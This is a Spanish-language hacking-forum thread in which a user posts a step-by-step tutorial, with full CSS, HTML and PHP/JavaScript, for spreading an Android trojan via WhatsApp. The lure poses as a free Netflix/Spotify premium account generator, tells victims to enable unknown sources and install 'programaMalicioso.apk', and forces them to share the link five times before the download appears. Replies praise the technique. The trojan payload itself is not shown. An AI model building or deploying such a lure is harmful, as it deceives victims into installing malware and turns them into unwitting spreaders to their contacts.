Propagación de Malware en Android a través de Whatsapp

  • 5 Respuestas
  • 8501 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado rollth

  • *
  • Ex-Staff
  • *****
  • Mensajes: 876
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
  • Twitter: @RoloMijan
    • Ver Perfil
    • Whateversec
    • Email
Muy buenas Underc0ders,

hoy quería mostrar una técnica que llevo viendo mucho tiempo, en la cual se difunde algo con ingeniería social y forzándote a enviar Whatsapp para poder utilizar alguna herramienta, y así poder mostrarte publicidad. En este caso en lugar de mostrar publicidad vamos a hacer que la víctima descargue una aplicación maliciosa, para estoy yo voy a configurar un troyano con You are not allowed to view links. Register or Login.



Yo además de esto he creado una interfaz gráfica para poder engañar al usuario, simulando un generador de cuentas premium tanto en Netflix como en Spotify.



Una vez hecho esto vamos a crear una página donde indique como descargar y usar esta aplicación, al ser una infección en Android tendremos que decirle al usuario que active la opción de aceptar apk's externas a Google Play. Así ha quedado en mi caso.

estilo.css

Código: CSS
  1. body{
  2. background-color: black;
  3. }
  4.  
  5. h1{
  6. color: white;
  7. font-family: 'PT Sans';
  8. }
  9.  
  10. h2{
  11. color: red;
  12. font-family: 'PT Sans';
  13. }
  14.  
  15. h3{
  16. color: white;
  17. font-family: 'PT Sans';
  18. }
  19.  
  20. p{
  21. color: white;
  22. font-family: 'PT Sans';
  23. }
  24.  
  25.  
  26. .boton_1{
  27.     text-decoration: none;
  28.     padding: 3px;
  29.     padding-left: 10px;
  30.     padding-right: 10px;
  31.     font-family: helvetica;
  32.     font-weight: 300;
  33.     font-size: 25px;
  34.     font-style: italic;
  35.     color: #006505;
  36.     background-color: #82b085;
  37.     border-radius: 15px;
  38.     border: 3px double #006505;
  39. }
  40. .boton_1:hover{
  41.     opacity: 0.6;
  42.     text-decoration: none;
  43. }

instalacionAndroid.html

Código: HTML5
  1. <You are not allowed to view links. Register or Login>
  2. <You are not allowed to view links. Register or Login>
  3. <You are not allowed to view links. Register or Login>Instalar Generador de cuentas Spotify/Netflix para Android</You are not allowed to view links. Register or Login>
  4. <You are not allowed to view links. Register or Login REL="StyleSheet" href="estilo.css" type="text/css" MEDIA="screen">
  5. </You are not allowed to view links. Register or Login>
  6. <You are not allowed to view links. Register or Login>
  7. <You are not allowed to view links. Register or Login align="center">
  8. <You are not allowed to view links. Register or Login>GUIA DE USO GENERADOR DE CUENTAS PREMIUM</You are not allowed to view links. Register or Login>
  9. <You are not allowed to view links. Register or Login>Usar la aplicación generadora de cuentas Premium para Spotify y para Netflix es muy sencillo.</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login><You are not allowed to view links. Register or Login>
  10. - PASO 1: Elegir en qué plataforma quiere crear la cuenta.</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  11. - PASO 2: Añadir el usuario y contraseña que quiera usar.</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  12. - PASO 3: Pulsar el botón dado para crear la cuenta.</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  13. - PASO 4: Esperar varios minutos.</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  14. - PASO 5: Entrar con dicho usuario y contraseña en la plataforma elegida.</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  15.  
  16. <You are not allowed to view links. Register or Login src="ImagenRegistro.png">
  17. <You are not allowed to view links. Register or Login>GUIA INSTALACION GENERADOR DE CUENTRAS PREMIUM</You are not allowed to view links. Register or Login>
  18. <You are not allowed to view links. Register or Login>Para instalarlo deberás aceptar aplicaciones no provenientes de Google Play en tu móvil.</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  19. <You are not allowed to view links. Register or Login>
  20. - PASO 1: Dirigete a la configuración de tu móvil.</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  21. - PASO 2: Dirigete al submenú Seguridad / Aplicaciones.</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  22. - PASO 3: Activa la opción "Fuentes desconocidas".</You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  23. <You are not allowed to view links. Register or Login src="http://img-17.ccm2.net/PoRKJZp-i7i9B_VAXJZ1C8gmofk=/2bd3dffc46954811a306b181e203cf9e/ccm-faq/itar-fuentes-desconocidas-android-s-.png"></You are not allowed to view links. Register or Login></You are not allowed to view links. Register or Login>
  24. - PASO 4: Descarga la aplicación de este <You are not allowed to view links. Register or Login href="programaMalicioso.apk">link</You are not allowed to view links. Register or Login> y empieza a utilizarla.
  25. </You are not allowed to view links. Register or Login>
  26. </You are not allowed to view links. Register or Login>
  27. </You are not allowed to view links. Register or Login>
  28. </You are not allowed to view links. Register or Login>





El siguiente paso sería hacer la página que nos obligará a compartir el enlace y una vez compartido nos dará permiso para ir a lo que hicimos anteriormente, y así podran descargar nuestro "generador de contraseñas premium". Les dejo el código y a continuación lo voy explicando por partes.

index.php

Código: PHP
  1. <html>
  2. <head>
  3. <title>COMPARTA LA APLICACION</title>
  4. <link REL="StyleSheet" href="estilo.css" type="text/css" MEDIA="screen">
  5. <script>
  6. <?php
  7.  
  8. include('Mobile-Detect/Mobile_Detect.php');
  9. $detect = new Mobile_Detect();
  10.  
  11. if ( $detect->isAndroidtablet() ) {
  12.    $an = 1;
  13. } elseif( $detect->isAndroid() ) {
  14.    $an = 1;
  15. } else{
  16.    $an = 0;
  17. }
  18.  
  19. echo '
  20. var an = '.$an.';
  21. '
  22. ?>
  23.  
  24. var compartido = 0;
  25. function compartir(){
  26.    compartido++;
  27.    document.getElementById("comp").innerHTML = compartido;
  28.    window.open("https://api.whatsapp.com/send?text=Aplicacion%20generadora%20de%20cuentas%20Premium%20totalmente%20gratuita.%20Funcional%20en%20NETFLIX%20y%20Sporify.%20Descarga%20ahora%20en:%20192.168.1.37/index.php");
  29. }
  30. function descargar(){
  31.    if (compartido >= 5){
  32.       location.href = "instalacionAndroid.html";  
  33.    }
  34.    else{
  35.       alert("No ha compartido la herramienta suficientes veces.");  
  36.    }
  37. }
  38. </script>
  39. <script>
  40. function comprobar(){
  41.    if(an != 1){
  42.       document.getElementById("body").innerHTML = "";
  43.       alert("La aplicación es solo para Android");
  44.    }
  45. }
  46. </script>
  47. </head>
  48. <body onload="comprobar()" id="body">
  49. <div align="center">
  50. <h1>Para poder descargar la aplicación debe compartirla 5 veces por Whatsapp</h1>
  51. <h2>Veces compartida</h2> <h2 id="comp">0</h2>
  52. <button class="boton_1" onclick="compartir()">Compartir Por Whatsapp</button></br></br>
  53. <button class="boton_1" onclick="descargar()">Descargar aplicación</button></br></br>
  54. <img src="ImagenRegistro.png">
  55. </div>
  56. </body>
  57. </html>

Bien, ahora vemos por partes. Lo primero que tenemos que entender es esto:

Código: PHP
  1. include('Mobile-Detect/Mobile_Detect.php');
  2. $detect = new Mobile_Detect();
  3.  
  4. if ( $detect->isAndroidtablet() ) {
  5.    $an = 1;
  6. } elseif( $detect->isAndroid() ) {
  7.    $an = 1;
  8. } else{
  9.    $an = 0;
  10. }
  11.  
  12.  

Lo que hace esto es comprobar si estamos utilizando Android u otro sistema operativo, y de ahí crea una variable que pasa a JavaScript, que luego utilizaremos para que la página se comporte de una forma u otra dependiendo de donde se esté corriendo.

Para ello he incluído una librería que podéis encontrar You are not allowed to view links. Register or Login.

Código: Javascript
  1. function comprobar(){
  2.    if(an != 1){
  3.       document.getElementById("body").innerHTML = "";
  4.       alert("La aplicación es solo para Android");
  5.    }
  6. }

Esta parte comprueba que la página se está visualizando desde un Android, en caso contrario manda una alerta y no muestra nada.



Código: Javascript
  1. var compartido = 0;
  2. function compartir(){
  3.    compartido++;
  4.    document.getElementById("comp").innerHTML = compartido;
  5.    window.open("https://api.whatsapp.com/send?text=Aplicacion%20generadora%20de%20cuentas%20Premium%20totalmente%20gratuita.%20Funcional%20en%20NETFLIX%20y%20Sporify.%20Descarga%20ahora%20en:%20192.168.1.37/index.php");
  6. }
  7. function descargar(){
  8.    if (compartido >= 5){
  9.       location.href = "instalacionAndroid.html";  
  10.    }
  11.    else{
  12.       alert("No ha compartido la herramienta suficientes veces.");  
  13.    }
  14. }

Esta parte crea dos funciones, la primera es la que te hace compartir el mensaje por whatsapp, además tiene un contador que se va actualizando cada vez que compartes.

La segunda sirve para descargar, comprueba si lo has compartido las suficientes veces y en caso positivo te redirecciona al lugar donde puedes descargar la aplicación.

Para compartir la aplicación por Whatsapp se usa el siguiente link, donde texto es el texto del mensaje que deberán enviar.

You are not allowed to view links. Register or Login

Una vez hecho esto veamos como quedaría.



Vemos que al darle al compartir nos manda a Whatsapp para enviar el mensaje de la siguiente forma.







Al compartir y volver veremos que el contador ha aumentado, entonces al llegar a 5 podremos descargar nuestra aplicación, en caso de pulsar el otro botón antes de haber compartido 5 veces nos saldrá una alerta y no nos dejará.



Ya estaría todo hecho, sé que esto se podría hacer mucho mejor, pero así es la idea básica de como funcionaría, si alguien quiere aportar código bienvenido es.

También me pueden seguir en Twitter si les hace ilusión: You are not allowed to view links. Register or Login

Saludos.
« Última modificación: Abril 01, 2018, 10:19:11 am por rollth »

Rollth
Buen hacker mejor persona.
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1951
  • Actividad:
    3.33%
  • Country: es
  • Reputación 16
    • Ver Perfil
Muy bueno, además es bastante utilizado, así que es útil que la gente conozca la técnica.

Gracias @You are not allowed to view links. Register or Login

Un saludo.


Desconectado Stiuvert

  • *
  • Ex-Staff
  • *****
  • Mensajes: 2682
  • Actividad:
    13.33%
  • Reputación 15
  • Skype: [email protected]
  • Twitter: @Stiuvert
    • Ver Perfil
¡Genial aporte rollth!
Hace falta mucha ingeniería social pero la idea y el método usado es buenísimo.

Saludos

Desconectado roadd

  • *
  • Underc0der
  • Mensajes: 119
  • Actividad:
    0%
  • Reputación 2
  • Skype: [email protected]
  • Twitter: @RoaddHDC
    • Ver Perfil
    • Hacking Desde Cero By Roadd Dogg
Excelente Rolo! Como siempre.

No solo es un lujo el poder leerte sino que tambien hasta nos deja el css xD aporte 100%
Web: You are not allowed to view links. Register or Login
Igm: /secureart
Telegram: @roaddhdc
Correo: [email protected]
Face: /roaddhdc
Twitter: @roaddhdc
Youtube: You are not allowed to view links. Register or Login

Desconectado rollth

  • *
  • Ex-Staff
  • *****
  • Mensajes: 876
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
  • Twitter: @RoloMijan
    • Ver Perfil
    • Whateversec
    • Email
Muchas gracias a los 3 por vuestros comentarios, me alegra mucho que haya gustado :D

Saludos,

Rollth
Buen hacker mejor persona.
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Desconectado Nobody

  • *
  • Underc0der
  • Mensajes: 197
  • Actividad:
    0%
  • Country: 00
  • Reputación 4
  • Security as art.
  • Twitter: @n0bodysec
    • Ver Perfil
    • Personal Website
¡Sencillamente excelente!
Creo que es el primer análisis sobre este tipo de propagación que veo.

Gracias por el aporte, Rolo.

Saludos.
You are not allowed to view links. Register or Login

 

Como tomar control de un dispositivo Android en menos de 1 minuto

Iniciado por ANTRAX

Respuestas: 26
Vistas: 33194
Último mensaje Abril 29, 2020, 08:22:09 am
por balderg0d
WPA2 KRACK ATTACK - Prueba de concepto Android y Linux

Iniciado por DhaveSec

Respuestas: 1
Vistas: 4320
Último mensaje Octubre 16, 2017, 01:27:26 pm
por b4r7
Proyecto HackDroid – Aplicaciones de Pentesting para Android

Iniciado por CyberSec777

Respuestas: 1
Vistas: 3714
Último mensaje Abril 05, 2019, 12:31:58 pm
por baron.power
Herramientas de ciberseguridad para Android [Pengodroid 3]

Iniciado por Lautaro Villarreal Culic'

Respuestas: 2
Vistas: 3029
Último mensaje Mayo 15, 2019, 04:42:19 pm
por Lautaro Villarreal Culic'
Kwetza - Inyecta Payloads en Aplicaciones Android

Iniciado por ANTRAX

Respuestas: 0
Vistas: 3370
Último mensaje Julio 17, 2017, 12:08:55 pm
por ANTRAX